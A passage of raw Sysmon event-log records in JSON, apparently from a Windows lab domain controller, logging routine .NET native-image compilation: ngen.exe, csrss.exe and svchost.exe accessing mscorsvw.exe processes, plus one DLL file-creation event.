05:58:36.652","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001005120E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.652\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001005120E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.652","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001005120E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.652\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001005120E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.652","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001005120E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.746\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102A160E00}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.746","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102A160E00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.746\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102A160E00}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.746","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102A160E00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.761\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-00102A160E00}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.761","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-00102A160E00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:37.574\r\nProcessGuid: {A837DB8D-048C-5F25-0000-00102A160E00}\r\nProcessId: 5108\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f4-0\\Microsoft.Transactions.Bridge.dll\r\nCreationUtcTime: 2020-08-01 05:58:37.574","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:37.574","ProcessGuid":"{A837DB8D-048C-5F25-0000-00102A160E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f4-0\\Microsoft.Transactions.Bridge.dll","CreationUtcTime":"2020-08-01 05:58:37.574","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.636\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.636","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.636\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:37.636","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:37.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 